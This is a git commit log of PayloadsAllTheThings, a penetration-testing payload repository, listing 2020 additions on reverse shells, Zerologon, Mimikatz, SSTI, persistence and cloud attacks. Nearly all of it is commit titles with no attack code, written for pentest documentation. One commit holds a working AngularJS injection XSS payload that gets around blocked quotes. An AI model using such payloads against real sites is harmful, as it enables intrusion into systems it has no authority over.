Fix(Docs): Correcting typos on the repo
2020-10-17 23:06:44 +02:00
Vincent Gilles
0b90094002 Fix(Docs): Correcting typos on the repo 2020-10-17 22:52:35 +02:00
Swissky
4a4df791ed Merge pull request #266 from marcan2020/patch-6
Add Python bind shell
2020-10-17 20:58:21 +02:00
marcan2020
693349da56 Add Python bind shell 2020-10-17 14:52:36 -04:00
Swissky
b641131f27 SSTI - Pebble update 2020-10-17 12:25:50 +02:00
Swissky
5a1ae58a59 Sticky Notes Windows + Cobalt SMB 2020-10-16 11:35:15 +02:00
Swissky
3368084b2d CS Beacon - SMB Error Code 2020-10-15 17:22:00 +02:00
Swissky
b32f4754d7 Keytab + schtasks 2020-10-15 12:35:05 +02:00
Siddharth Reddy
483d8796d5 Update README.md 2020-10-09 18:17:06 +05:30
Swissky
2ab1c58dac Merge pull request #261 from SiddTim/patch-3
Update README.md
2020-10-09 14:45:50 +02:00
Swissky
3e159534b8 Merge pull request #262 from SiddTim/patch-4
Update Cassandra Injection.md
2020-10-09 14:44:45 +02:00
Siddharth Reddy
fdc44ce84e Update Cassandra Injection.md
Broken link [Injection In Apache Cassandra – Part I - Rodolfo - EternalNoobs](https://eternalnoobs.com/injection-in-apache-cassandra-part-i/)
2020-10-09 18:10:12 +05:30
Siddharth Reddy
dbc3cb38ea Update README.md
Page not found [Local file inclusion mini list - Penetrate.io](https://penetrate.io/2014/09/25/local-file-inclusion-mini-list/).
2020-10-09 17:59:30 +05:30
Swissky
913f2d2381 Merge pull request #253 from yoavbls/add-cloudflared
Use cloudflared to expose internal services
2020-10-09 10:34:26 +02:00
Swissky
0f098c8a2c Merge pull request #251 from ritiksahni/patch-1
Removed broken link
2020-10-09 10:33:43 +02:00
Swissky
a8319b94ff Merge pull request #259 from SiddTim/patch-1
Update Cassandra Injection.md
2020-10-09 10:31:58 +02:00
Swissky
f03da2a53e Merge pull request #260 from SiddTim/patch-2
Update MSSQL Injection.md
2020-10-09 10:31:48 +02:00
Siddharth Reddy
f284045ba6 Update MSSQL Injection.md
Broken link [Sqlinjectionwiki - MSSQL](http://www.sqlinjectionwiki.com/categories/1/mssql-sql-injection-cheat-sheet/) .
2020-10-09 12:53:21 +05:30
Siddharth Reddy
f66c53ee25 Update Cassandra Injection.md
Broken link [https://hack2learn.pw/cassandra/login.php]
2020-10-09 12:45:28 +05:30
Swissky
c9be68f0a1 Privilege File Write - Update 2020-10-08 16:51:11 +02:00
Swissky
0df0cc9cf8 Privileged File Write 2020-10-08 16:39:25 +02:00
Swissky
52b0cd6030 Ligolo Reverse Tunneling 2020-10-08 11:23:12 +02:00
Swissky
7014cb37d2 Merge pull request #258 from Shad0wMazt3r/master
Added YouTube Channels
2020-10-08 10:04:59 +02:00
Swissky
5c810b0e62 Update YOUTUBE.md 2020-10-08 10:01:45 +02:00
Pratyaksha Beri
6b03d32af0 Added a lot more content 2020-10-08 10:21:49 +05:30
Pratyaksha Beri
559fd9dcf8 Added STÖK 2020-10-08 09:53:29 +05:30
Swissky
63270e4d42 Delete Logs-files.txt
Fix for https://github.com/swisskyrepo/PayloadsAllTheThings/issues/141
2020-10-07 22:25:25 +02:00
Swissky
417c972871 Merge pull request #257 from vavkamil/vavkamil/cache-deception
Update `Web Cache Deception` section
2020-10-07 20:16:14 +02:00
Kamil Vavra
7229b45f3a Update References
- remove broken link
- add Entanglement article
- add Web Security Academy links
2020-10-07 19:31:46 +02:00
Kamil Vavra
aedf84283a Sort the intruder wordlist
Sorted alphabetically for better visibility
2020-10-07 19:20:16 +02:00
Kamil Vavra
73a94b3de7 Update list of headers
Sync with current wordlist from param-miner
2020-10-07 19:15:22 +02:00
Swissky
4a63544b75 CORS Fix typo 2020-10-06 23:17:34 +02:00
Swissky
d6feb565ce Merge pull request #254 from irotem/irotem-traversal-patch-1
Added traversal bypass of nginx/alb
2020-10-04 14:18:07 +02:00
irotem
e8744406f9 Added traversal bypass of nginx/alb 2020-10-04 12:42:51 +03:00
YoavB
dbddc717af Use cloudflared to expose internal service 2020-10-03 22:34:28 +03:00
Swissky
b0a9d49aea Leaking Password Reset Token 2020-10-03 11:30:09 +02:00
ritiksahni
7e0e06682b Removed broken link
The bitrot.sh domain has expired, and hence the link in the markdown file was broken.
2020-10-03 00:25:36 +05:30
Swissky
e081b3afab Merge pull request #250 from c-nagy/master
Added cURL command for Wayback Machine querying
2020-10-02 19:30:42 +02:00
@cnagy
50c12f2e71 Added cURL command for Wayback Machine querying 2020-10-02 15:26:57 +00:00
Swissky
e62b68a74b Merge pull request #248 from c-nagy/master
Updated Responder link and added InveighZero
2020-10-02 10:31:13 +02:00
@cnagy
ec1f89fbe6 Updated Responder link and added InveighZero 2020-10-02 04:39:09 +00:00
Swissky
837d2641b7 Persistence - Scheduled Tasks 2020-09-30 11:46:04 +02:00
Swissky
ef90ce9bce ATO - Fix typo 2020-09-27 20:05:56 +02:00
Swissky
6c1a6c41aa Docker - Kernel Module 2020-09-27 13:53:13 +02:00
Swissky
e36ae2458d Merge branch 'master' of https://github.com/swisskyrepo/PayloadsAllTheThings into master 2020-09-27 11:17:33 +02:00
Swissky
21f2b5dca6 Upload Methodology 2020-09-27 11:16:50 +02:00
Swissky
a57305e75f Merge pull request #246 from wuvel/master
Update PHP.md
2020-09-25 13:30:12 +02:00
Muhammad Fikri Ashari
992732877f Update PHP.md 2020-09-25 09:43:35 +07:00
Swissky
0a01854a6a Update CONTRIBUTING.md 2020-09-23 18:06:56 +02:00
Swissky
3a227603a1 CONTRIBUTING.md in expectation of Hacktoberfest 2020-09-23 17:59:06 +02:00
Swissky
0cee482b32 Merge pull request #239 from zero77/patch-1
Update Linux - Persistence.md
2020-09-23 17:30:32 +02:00
Swissky
229502c497 Update Linux - Persistence.md 2020-09-23 17:29:34 +02:00
Swissky
a478356f43 MySQL Fast Exploitation using json_arrayagg() 2020-09-23 17:19:34 +02:00
Swissky
4d5c10965d Account Takeover 2020-09-19 11:30:32 +02:00
Swissky
1a0e31a05e Zero Logon - Restore pwd 2020-09-18 21:21:55 +02:00
Swissky
f4ef56fca0 Mimikatz Zerologon + reset pwd 2020-09-17 14:05:54 +02:00
Swissky
62678c26ce .NET Zero Logon 2020-09-16 14:31:59 +02:00
Swissky
14586e4d7a ZeroLogon via Mimikatz 2020-09-16 14:13:40 +02:00
Swissky
e79918bdc2 CVE-2020-1472 Unauthenticated domain controller compromise 2020-09-14 23:06:09 +02:00
Swissky
20dadc9815 PHP Phar Deserialization 2020-09-10 15:26:16 +02:00
Swissky
543f63d7de PHP POP Chain 2020-09-10 15:15:53 +02:00
Swissky
ddabfd7531 Merge pull request #244 from noraj/patch-1
LDAP: add SSH key authentication via LDAP
2020-09-09 13:21:34 +02:00
Alexandre ZANNI
93751d8650 add SSH key authentication via LDAP 2020-09-09 12:15:07 +02:00
Swissky
6c1e3402e0 Merge pull request #243 from noraj/patch-1
LDAP: fix AdmYSsion link + add 2 tutorials
2020-09-09 10:58:18 +02:00
Alexandre ZANNI
9554aa2ed9 fix AdmYSsion link + add 2 tutorials 2020-09-09 09:57:21 +02:00
Swissky
bcd700c951 AWS API calls that return credentials - kmcquade 2020-09-06 17:11:30 +02:00
Swissky
b5e511c03b Merge pull request #242 from maxrodrigo/master
Fix PHP XSS data collector line breaks
2020-09-05 11:46:08 +02:00
Max Rodrigo
2f40961990 Fix PHP XSS data collector line breaks 2020-09-05 10:36:58 +02:00
Swissky
83fbdb906b Merge pull request #240 from Laxa/master
Fix typos
2020-09-03 14:16:36 +02:00
laxa
b4d9ee0634 Fix typos 2020-09-03 13:57:46 +02:00
zero77
f1d55a132a Update Linux - Persistence.md 2020-09-02 09:43:25 +00:00
Swissky
734bb7ce98 Merge pull request #238 from cnotin/patch-1
Remove "Leaked API keys" section
2020-09-01 11:48:56 +02:00
Clément Notin
6865492a6b Remove "Leaked API keys" section
It's in the "API Key Leaks" folder now and the content is already present there
2020-08-31 23:54:48 +02:00
Swissky
9a372ec810 Merge pull request #237 from chr-ge/master
Added missing word
2020-08-26 11:56:38 +02:00
chr-ge
88f8b7d1aa Added missing word 2020-08-25 23:14:33 +00:00
Swissky
426c2be37e Merge branch 'master' of https://github.com/swisskyrepo/PayloadsAllTheThings into master 2020-08-25 14:39:19 +02:00
Swissky
f431ea7166 HTTP Request Smuggling 2020-08-25 14:38:28 +02:00
Swissky
3ef51a12ce Update README.md 2020-08-22 23:45:49 +02:00
Swissky
75a0f34bdc Merge pull request #236 from Techbrunch/patch-9
Update README.md
2020-08-19 16:30:32 +02:00
Swissky
845326dd61 Merge pull request #235 from Techbrunch/patch-7
Update README.md
2020-08-19 16:30:15 +02:00
Techbrunch
502a8121b4 Update README.md
Add reference to debug tag for Jinja2
2020-08-19 14:46:43 +02:00
Techbrunch
76e6f7dc95 Update README.md
Add Handlebars payload
2020-08-19 14:20:18 +02:00
Swissky
cc95f4e386 AD - Forest to Forest compromise 2020-08-18 09:33:38 +02:00
Swissky
6e526de7b4 Merge pull request #234 from justin-p/patch-1
Added GenericWrite example for values used by the Remote Connection Manager.
2020-08-17 15:35:26 +02:00
Justin Perdok
f11c45650b Update Active Directory Attack.md 2020-08-17 13:18:30 +00:00
Justin Perdok
1284715128 Update Active Directory Attack.md 2020-08-17 13:15:33 +00:00
Justin Perdok
6f3f2239fa GenericWrite and Remote Connection Manager
Added content from https://sensepost.com/blog/2020/ace-to-rce/
2020-08-17 13:00:04 +00:00
Swissky
d386790fd2 Merge pull request #233 from virenpawar/patch-1
[Update] Added 1 payload
2020-08-17 12:03:46 +02:00
Viren Pawar
0266a7dd67 [Update] Added 1 payload
Added one payload which executes without any usage of single or double quotes. Helpful when you have AngularJS injection but quotes are blocked by the application.
Working proof of payload here:

https://portswigger-labs.net/xss/angularjs.php?type=reflected&csp=0&version=1.6.0&x={{x=valueOf.name.constructor.fromCharCode;constructor.constructor(x(97,108,101,114,116,40,49,41))()}}
2020-08-15 16:29:13 +05:30
Swissky
d1104d6ce1 Merge pull request #230 from bsysop/patch-2
Typo in Excel extension name
2020-08-12 12:46:49 +02:00
bsysop
93f321879f Typo in Excel extension name 2020-08-11 21:35:36 -03:00
Swissky
d00d7c9788 Banner HD with credit 2020-08-10 11:36:18 +02:00
Swissky
33129f2b4c Silver Ticket with services list 2020-08-09 19:25:03 +02:00
Swissky
c7e3ea005e Powershell Remoting 2020-08-09 12:15:56 +02:00
Swissky
268b4c2d47 Merge pull request #229 from DeWaRs1206/master
Fix Corsy link URL
2020-07-29 18:08:48 +02:00
Emmanuel Iturbide
fbf896edf1 Fix Corsy link URL 2020-07-29 17:53:07 +02:00
Swissky
767eb04af6 Persistence - Typo 2020-07-21 19:48:57 +02:00
Swissky
ca9326b5fc Driver Privilege Escalation 2020-07-13 15:00:36 +02:00
Swissky
dd40ddd233 XSS summary subentries + GraphTCP 2020-07-12 14:44:33 +02:00
Swissky
94f6e31905 Merge pull request #227 from HLOverflow/PostgresqlFilterBypass
Postgresql filter bypass
2020-07-12 10:49:22 +02:00
hloverflow
2e7b9db94b Corrected Reference to 2009 paper 2020-07-12 13:21:18 +08:00
HLOverflow
37f66cc523 add to table of content 2020-07-12 13:17:43 +08:00
hloverflow
baadc6d3e9 contribute PostgreSQL bypass quotes technique 2020-07-12 13:14:26 +08:00
HLOverflow
982ac3968c Merge pull request #1 from swisskyrepo/master
pull from main repository
2020-07-12 12:33:57 +08:00
Swissky
d3f1bfa1ae Merge pull request #209 from c14dd49h/patch-1
Update README.md
2020-07-11 10:50:04 +02:00
Swissky
2c935df34d EL Injection - SSTI 2020-07-10 15:05:13 +02:00
Swissky
cd3de64c73 Merge pull request #225 from artiommocrenco/patch-1
Add TLS-PSK OpenSSL reverse shell method
2020-07-08 17:31:17 +02:00
Artiom Mocrenco
62443a3753 fix typo 2020-07-08 18:01:12 +03:00
Artiom Mocrenco
2d7d6d6eed Add TLS-PSK OpenSSL reverse shell method 2020-07-08 17:01:38 +03:00
Swissky
bb1e710806 Merge pull request #224 from marcan2020/patch-5
Add introspection without fragments
2020-07-08 10:16:18 +02:00
marcan2020
1553115e19 Add introspection without fragments 2020-07-07 22:03:01 -04:00
Swissky
c1d74a1252 Merge pull request #223 from m-veljkovic/patch-1
Update README.md
2020-07-07 10:32:00 +02:00
Milan Veljkovic
d317b46af9 Update README.md
I met with /var/log/apache2/ more often than /var/log/apache/, and I believe if someone is following this list, the apache2 items will make a difference. Cheers!
2020-07-06 23:43:47 +02:00
Swissky
5b1a79cb56 Docker device file breakout 2020-07-04 19:00:56 +02:00
Swissky
f86837ca8c Fix #211 2020-06-24 12:10:41 +02:00
Swissky
ee43329187 Merge pull request #221 from looCiprian/patch-1
Add jsfuck bypassing method to xss cheat sheet
2020-06-24 12:08:56 +02:00
looCiprian
93a372cea4 Add jsfuck bypassing method to xss cheat sheet 2020-06-23 18:34:02 +02:00
Swissky
e9ee3bb59b Merge pull request #219 from clem9669/patch-4
Add useful always existing windows file
2020-06-23 18:00:04 +02:00
clem9669
e37aff2fcd Add useful always existing windows file
Adding an always-existing file on recent Windows machines. Ideal to test path traversal, but nothing much interesting inside.
2020-06-23 14:26:46 +00:00
Swissky
b9295bf504 Merge pull request #218 from noraj/patch-1
XXE ref. refactor
2020-06-23 15:01:26 +02:00
Alexandre ZANNI
7aef550c39 XXE ref. refactor
- Add new refs
- Format title with date, author, etc.
- Remove dead hosts:
  - agrawalsmart7.com
  - esoln.net
2020-06-22 15:53:07 +02:00
Swissky
6c63d9c9d9 Merge pull request #217 from alexlauerman/master
Improved Clarity of SSRF redirect
2020-06-22 11:06:12 +02:00
Alex Lauerman
d5c1f39c0f Added DNS Rebinding 2020-06-21 16:31:16 -05:00
Alex Lauerman
c39c904c9a Moved bypasses under the bypasses section 2020-06-21 16:27:32 -05:00
Alex Lauerman
6d37ad9e2e Improved Clarity of ssrf redirect 2020-06-21 16:19:15 -05:00
Swissky
36bbfd877f Merge branch 'master' of https://github.com/swisskyrepo/PayloadsAllTheThings 2020-06-18 11:56:22 +02:00
Swissky
ecf29c2cbe Active Directory - Mitigations 2020-06-18 11:55:48 +02:00
Swissky
29575f54f7 Merge pull request #216 from rezaduty/patch-3
Update README.md
2020-06-17 10:35:57 +02:00
reza.duty
010b550dec Update README.md 2020-06-17 11:42:26 +04:30
Swissky
74325476a0 Merge pull request #215 from bsysop/patch-1
metadata.nicob.net no longer resolves to metadata IP
2020-06-14 18:47:35 +02:00
bsysop
24981f945f metadata.nicob.net no longer resolves to metadata IP
```
$ dig +short metadata.nicob.net
...
```

Not resolving
2020-06-14 12:08:25 -03:00
Swissky
701219932d Merge pull request #214 from rezaduty/patch-2
Update README.md
2020-06-09 18:29:02 +02:00
reza.duty
03a0bda20d Update README.md 2020-06-09 20:05:32 +04:30
Swissky
c24cb01715 Merge pull request #213 from DidierA/DidierA-patch-1
clarification in 'bypass character filter'
2020-06-06 00:05:13 +02:00
Didier Arenzana
bd0c6847b8 clarification in 'bypass character filter'
Added the results of the echo and tr commands for clarification.
2020-06-04 17:26:45 +02:00
Swissky
71ddb449ce Windows Persistence 2020-06-01 21:37:32 +02:00
Swissky
137333cef6 Merge pull request #210 from meizjm3i/meizj-PayloadsAllTheThings
Update ERB SSTI tips
2020-05-29 13:54:44 +02:00
meizjm3i
a987b8be9f corrected a single quotation mark closure error 2020-05-29 18:35:22 +08:00
meizjm3i
7670e2c36c Update ERB SSTI tips 2020-05-29 12:28:55 +08:00
Swissky
5323ceb37c SUDO CVE + Windows Drivers PrivEsc 2020-05-28 11:19:16 +02:00
c14dd49h
5b47fc8ead Update README.md 2020-05-27 18:53:37 +02:00
Swissky
4ca5e71c2f Bind shell cheatsheet (Fix #194) 2020-05-24 14:09:46 +02:00
Swissky
c734586e72 Merge pull request #208 from noraj/patch-1
PHP Unserialize : add more refs
2020-05-17 00:12:03 +02:00
Alexandre ZANNI
cb8bf8ea66 add more refs 2020-05-16 22:58:11 +02:00
Swissky
c1731041b5 Misc & Tricks Page + AMSI + Defender 2020-05-16 13:22:55 +02:00
Swissky
81655945f9 Merge pull request #207 from victoni/master
Adding the solution of Magic Bytes in the Unrestricted File Upload section
2020-05-14 12:13:52 +02:00
beomsu317
4c3cb6f530 Update SQL-Injection 2020-05-14 15:29:52 +09:00
vict0ni
e61db57ff1 Update README.md
fixed indentation
2020-05-14 00:10:12 +02:00
vict0ni
7b8514f1f5 Update README.md
Added "adding magic bytes" solution
2020-05-14 00:09:30 +02:00
Swissky
eb074393df Windows Persistence - Binary replacing 2020-05-13 23:07:39 +02:00
Swissky
1d8714615d Merge pull request #206 from engn33r/master
Added SSRF bypass details
2020-05-13 22:47:57 +02:00
John
a5d220d599 Added SSRF bypass details 2020-05-13 12:19:36 -04:00
Swissky
a65fdbb568 XSW 4 Fix #205 2020-05-12 14:27:25 +02:00
Swissky
e95a4aeac0 MSOL AD Spray 2020-05-11 17:08:03 +02:00
Swissky
3ed2b28e59 Add user /Y + GPO Powerview 2020-05-10 23:16:29 +02:00
Swissky
7f1c150edd Mimikatz Summary 2020-05-10 16:17:10 +02:00
Swissky
770723d9da Merge pull request #204 from ThomasOrlita/master
Update CSP Evaluator blog link
2020-05-10 12:59:48 +02:00
Thomas Orlita
d0bb0f6f5b Update CSP Evaluator blog link 2020-05-10 10:32:51 +02:00
Swissky
a436e0fe7e Merge pull request #202 from rezaduty/patch-1
add Self Closing Script
2020-05-06 22:16:05 +02:00
reza.duty
eb28e4c28d add Self Closing Script 2020-05-06 22:57:55 +04:30
Swissky
a322dc2da9 Merge pull request #200 from denandz/master
Added Postgres SQLi information on xml helpers and file read/write
2020-05-05 15:14:39 +02:00
DoI
5aad5795d2 minor spelling fix 2020-05-05 15:15:50 +12:00
DoI
53db029d4e Added additional info to the Postgres SQLi page 2020-05-05 15:10:44 +12:00
Swissky
a4b987d46b Merge pull request #198 from joker2a/patch-1
Update Linux - Privilege Escalation.md
2020-05-04 12:09:35 +02:00
joker2a
32b83da302 Update Linux - Privilege Escalation.md
Add new privesc for CentOS/RedHat:
Writable /etc/sysconfig/network-scripts/
2020-05-04 11:44:24 +02:00
Swissky
5c7e67b05d Merge pull request #197 from guanicoe/patch-2
Update Windows - Privilege Escalation.md
2020-05-03 23:17:05 +02:00
guanicoe
1fc8b57c85 Update Windows - Privilege Escalation.md
added Get-Process to list processes
2020-05-03 21:11:01 +00:00
Swissky
5163ef902c XSS Google Scholar Payload + Skeleton Key Persistence 2020-05-03 16:28:17 +02:00
Swissky
e9b296adb3 DoyenSec Payloads XSS Google Scholar 2020-05-02 14:31:33 +02:00
Swissky
da5dc1299e MSSQL Trusted Link 2020-05-01 12:06:18 +02:00
Swissky
008cbcf9fc Merge pull request #196 from idealphase/master
Adding Execute code using SSTI for ERB engine in SSTI vulnerability payload
2020-04-30 12:30:40 +02:00
idealphase
712e3b93f6 Sorting like basic injection part 2020-04-30 17:15:31 +07:00
idealphase
7f1fb32980 Adding Execute code using SSTI for ERB engine. 2020-04-30 17:13:58 +07:00
Swissky
04899355ad Magic Hashes + SQL fuzz 2020-04-26 21:43:42 +02:00
Swissky
879ead1558 Merge pull request #193 from pascalschulz/patch-1
added Hacksplained's YT channel
2020-04-23 13:27:27 +02:00
Pascal Schulz
bdf06d4183 added Hacksplained's YT channel 2020-04-23 13:11:51 +02:00
Swissky
02ec624732 Merge pull request #192 from thibaudrobin/master
Linux privesc - SSH Key Predictable PRNG (Authorized_Keys) Process
2020-04-22 16:11:41 +02:00
Th1b4ud
7c8e9ac4ce Typo 2020-04-22 16:01:49 +02:00
Th1b4ud
14d03b96a1 Linux privesc - SSH Key Predictable PRNG (Authorized_Keys) Process - Summary 2020-04-22 16:00:31 +02:00
Th1b4ud
2e507a2b2f Linux privesc - SSH Key Predictable PRNG (Authorized_Keys) Process 2020-04-22 15:55:10 +02:00
Swissky
298da2d4e4 Merge pull request #191 from drakang4/patch-1
Fix typo
2020-04-22 09:59:31 +02:00
Heeryong Kang
c2b8018617 fix typo 2020-04-22 16:09:18 +09:00
Swissky
bf73393921 Merge pull request #188 from bohdansec/master
Update Cloudflare XSS bypasses
2020-04-21 23:57:06 +02:00
bohdansec
c4af354d8f Update Cloudflare XSS bypasses
Add 3 bypasses by Bohdan Korzhynskyi. Update twitter
2020-04-22 00:51:36 +03:00
bohdansec
2615968e96 Merge pull request #1 from swisskyrepo/master
Update
2020-04-22 00:12:54 +03:00
Swissky
735b0d2277 Merge pull request #187 from thibaudrobin/patch-2
Alternative TTY method with /usr/bin/script
2020-04-21 23:12:26 +02:00
Th1b4ud
2740600a6b Alternative TTY method with /usr/bin/script 2020-04-21 19:21:51 +02:00
Swissky
eaac0e748e Fix issue #185 2020-04-21 11:31:18 +02:00
Swissky
c8c4a6e8a9 Fix issue #185 2020-04-21 11:26:49 +02:00
Swissky
89f906f7a8 Fix issue - C reverse shell 2020-04-21 11:17:39 +02:00
Swissky
95fed140ec Fix - SSTI Payloads 2020-04-21 11:13:19 +02:00
Swissky
0de5cb7123 Merge pull request #186 from Techbrunch/patch-6
Add insomnia to GraphQL list of tools
2020-04-21 10:56:59 +02:00
Techbrunch
ade039c1bc Add insomnia to GraphQL list of tools 2020-04-21 10:49:47 +02:00
Swissky
1d8414c703 ASP.NET Razor SSTI 2020-04-18 21:18:22 +02:00
Swissky
af6760ef7a RoadRecon + JSON None refs 2020-04-17 16:34:51 +02:00
chiv
7e7f5e7628 Added SSTI RCE bypass payload for Jinja2 2020-04-13 18:48:43 +01:00
chiv
cc3b05017d Added a new RCE payload to Jinja2 SSTI bypasses 2020-04-13 18:44:16 +01:00
Swissky
44e676ea70 Merge pull request #182 from thibaudrobin/patch-1
Add others shell on reverse shell cheatsheet
2020-04-13 19:42:58 +02:00
Swissky
a19fd013fb Merge pull request #181 from SecGus/master
Added RCE SSTI Jinja2 Bypass payload developed by SecGus (chivato)
2020-04-13 19:42:14 +02:00
Th1b4ud
29194a8ef1 Add others shell on reverse shell cheatsheet
Add others shell on reverse shell cheatsheet
2020-04-13 19:06:01 +02:00
Swissky
bc8dd0b784 Merge pull request #180 from mindfuckup/master
Added: Other CORS Misconfigurations
2020-04-12 17:51:52 +02:00
Emanuel Duss
54e3887077 Added PortSwigger Web Security Academy CORS Link 2020-04-12 15:12:34 +02:00
Emanuel Duss
3e5b367224 Added CORS Exploit when wildcard origin is allowed 2020-04-12 15:06:28 +02:00
Emanuel Duss
f120024c6b Added CORS exploitation with strict trusted origin whitelist using XSS 2020-04-12 14:57:04 +02:00
Emanuel Duss
48fcdeb7ca Some clarification in the exploit code 2020-04-12 14:38:52 +02:00
Emanuel Duss
4537555714 Added: CORS Misconfiguration with Null Origin allowed 2020-04-12 14:30:16 +02:00
Swissky
dd42b44011 Merge pull request #179 from mindfuckup/master
Added: Cross-Site WebSocket Hijacking (CSWSH)
2020-04-11 18:26:22 +02:00
Emanuel Duss
930a3a0d8c Added: Cross-Site WebSocket Hijacking (CSWSH) 2020-04-11 16:24:32 +02:00
Swissky
89e49b676d Merge pull request #178 from Techbrunch/patch-4
Create web.web.config
2020-04-08 19:26:31 +02:00
Techbrunch
5902da38e4 Create web.web.config
Source: https://gist.github.com/gazcbm/ea7206fbbad83f62080e0bbbeda77d9c
2020-04-08 19:14:30 +02:00
Swissky
cea982c062 GraphQL Voyager - Represent any GraphQL API as an interactive graph 2020-04-04 22:33:28 +02:00
Swissky
6e7af5a267 Docker Registry - Pull/Download 2020-04-04 18:27:41 +02:00
Swissky
f748af16d2 Merge pull request #176 from Anon-Exploiter/patch-1
Using JWT's module to encode payload with type `None`
2020-04-04 14:49:37 +02:00
Syed Umar Arfeen
c9fcb58d57 Using JWT's module to encode payload with type None
Before, the JWT was encoded/decoded manually. The JWT module does all that without manual decoding and splitting.

This PR contains the code to encode the JWT token with type None using the JWT library in Python.
2020-04-04 16:03:56 +05:00
Swissky
78bd0867fe Merge pull request #175 from 3rg1s/master
Update SQLite Injection.md
2020-04-04 02:22:44 +02:00
fuxsocy.py
009a2f9276 Update SQLite Injection.md
Added new link location for the pdf.
2020-04-03 23:15:05 +00:00
Swissky
b5cc379c4b Merge pull request #173 from SakiiR/sakiir
Added filter(system) twig RCE
2020-03-30 09:28:58 +02:00
SakiiR SakiiR
38c273ff00 Added IFS (WAF bypass) to Symfony Twig RCE 2020-03-29 23:23:26 +02:00
SakiiR SakiiR
8b78c2fe71 Added filter(system) twig RCE 2020-03-29 23:19:27 +02:00
Swissky
231e41a59b Merge branch 'master' of https://github.com/swisskyrepo/PayloadsAllTheThings 2020-03-29 22:35:26 +02:00
Swissky
268d85b4bf Symfony SSTI Twig RCE 2020-03-29 22:34:26 +02:00
Swissky
0ba5ad3e71 Merge pull request #172 from bash-c/patch-1
Delete unnecessary escape characters
2020-03-29 20:23:25 +02:00
M4x
1d299f55c9 Delete unnecessary escape characters
`whoami` has already been wrapped in backquotes. There is no need to use escape characters again
2020-03-29 23:40:39 +08:00
Swissky
be8f32b586 Docker escape and exploit 2020-03-29 16:48:09 +02:00
Swissky
95ab07b45e CloudTrail disable, GraphQL tool 2020-03-28 12:01:56 +01:00
Swissky
d489597357 Merge pull request #169 from guenicoe/patch-1
added cmd on the USOSVC vuln
2020-03-24 21:17:37 +01:00
guenicoe
a3cc577ebd added cmd on the USOSVC vuln
Added `cmd \c C:\Users\nc.exe` as not typing `cmd \c` did not work for me. Might need even more explanation
2020-03-24 20:15:59 +00:00
Swissky
173366dc65 Merge pull request #167 from PixeLInc/patch-1
Remove example from win priv esc
2020-03-23 23:27:10 +01:00
PixeL
1b190939c4 Remove example from win priv esc
This example was used on hackthebox where it leaked the root flag of a machine on free servers.
This resulted in every user being able to get the root flag before they had even completed the box, which isn't fair to others.

This example should either be changed or removed completely to combat copy-pasting without knowing what you're doing.
2020-03-23 17:17:42 -05:00
Swissky
6c38274bdb Merge pull request #166 from fanixk/patch-1
Update Windows - Privilege Escalation.md
2020-03-22 21:56:05 +01:00
Fanis Katsimpas
2bdbb2dbc5 Update Windows - Privilege Escalation.md
Make powershell on EoP - Runas easier to copy paste
2020-03-22 19:25:35 +00:00
Swissky
4303caa08c README - Summary update 2020-03-19 12:03:32 +01:00
Swissky
1538ccd7f2 Gaining AWS Console Access via API Keys 2020-03-19 11:59:49 +01:00
Swissky
57b500b48e Merge pull request #165 from HLOverflow/master
More Bash tricks to bypass Command Injection filtering
2020-03-14 18:45:55 +01:00
HLOverflow
97dffcdc40 Update README.md 2020-03-15 01:11:47 +08:00
HLOverflow
3e184c10f9 Added additional character filter bypasses 2020-03-15 01:09:28 +08:00
Swissky
70182d32c9 Merge pull request #164 from Techbrunch/patch-3
Update AWS SSRF tips
2020-03-11 16:33:27 +01:00
Techbrunch
3abf2aff2a Update AWS SSRF tips
Added http://instance-data
2020-03-11 15:20:51 +01:00
Swissky
c20f84d09c Merge pull request #163 from SecGus/master
Improvement to the SSTI RCE
2020-03-09 20:06:32 +01:00
chiv
fe4bdb0df4 Improvement to the SSTI RCE 2020-03-09 18:19:33 +00:00
Swissky
1f3a94ba88 AWS SSM + Shadow copy attack 2020-03-06 15:30:38 +01:00
Swissky
5d87804f71 AWS EC2 Instance Connect + Lambda + SSM 2020-03-06 13:33:14 +01:00
Swissky
9207e0204c Merge pull request #162 from SecGus/master
Blind SQL Injection payloads missing from the website.
2020-03-02 15:22:44 +01:00
chivato
29fac06023 From https://twitter.com/secgus
MySQL Blind Queries and Data Exfiltration via the ORDER BY clause.
2020-03-01 21:15:19 +00:00
Swissky
c19e36ad34 Azure AD Connect - MSOL Account's password and DCSync 2020-03-01 17:06:31 +01:00
Swissky
71a307a86b AWS - EC2 copy image 2020-02-29 12:56:00 +01:00
Swissky
74f2dfccca Kerberos Constrained Delegation 2020-02-23 21:20:46 +01:00
Swissky
c5ac4e9eff AWS Patterns 2020-02-23 20:58:53 +01:00
Swissky
0b14b12fb4 Merge pull request #159 from noraj/patch-1
LDAPi: add scripts and dorks
2020-02-22 01:17:03 +01:00
Alexandre ZANNI
3fad2f364c add ruby script 2020-02-21 23:49:50 +01:00
Alexandre ZANNI
f28f83bda6 LDAPi: add scripts and dorks 2020-02-21 23:19:48 +01:00
Swissky
915946a343 Fix Cloud Training 2020-02-21 10:50:43 +01:00
Swissky
bda7100a77 Fix Cloud references 2020-02-21 10:47:16 +01:00
Swissky
984078050b Cloud - Pentest with AWS and Azure 2020-02-21 10:36:01 +01:00
Swissky
7f0650dfc0 IIS Raid Persistence 2020-02-20 16:51:22 +01:00
Swissky
73aa26ba68 Merge pull request #158 from 0xdf0xdf/master
Adding second method of chaining PHP filters
2020-02-20 13:07:39 +01:00
0xdf
9d06e1297f added additional way to chain php filters 2020-02-20 06:40:30 -05:00
0xdf
7d650e9622 fixed error in chaining php filters in File Inclusion page, added an additional example 2020-02-20 06:30:28 -05:00
Swissky
c2292145c8 Merge pull request #157 from Stoo0rmq/patch-1
Update File Inclusion
2020-02-18 12:38:43 +01:00
Borja
7be86354b2 Update File Inclusion
Added another path
2020-02-18 11:35:22 +00:00
Swissky
ba30618a8b Cobalt Strike - Artifact 2020-02-14 17:10:00 +01:00
Swissky
7cd49769be WMI + Cobalt Strike 2020-02-13 22:53:45 +01:00
Swissky
b76a23c77f Merge pull request #156 from bhattsameer/patch-1
Added more TTY Shell using perl and python
2020-02-09 12:15:00 +01:00
Sameer Bhatt (debugger)
994e557178 Added more TTY Shell using perl and python 2020-02-09 12:46:18 +05:30
Swissky
aba6874517 Maps API + secretsdump enabled user/pw last set + certutil mimikatz 2020-02-06 21:41:29 +01:00
Swissky
9c4578f083 Merge pull request #155 from socketz/master
Updated Java & Groovy Shells
2020-02-06 16:42:35 +01:00
socketz
056161fd9f Updated Java & Groovy Shells
Added threaded shells and alternative pure Java reverse shell
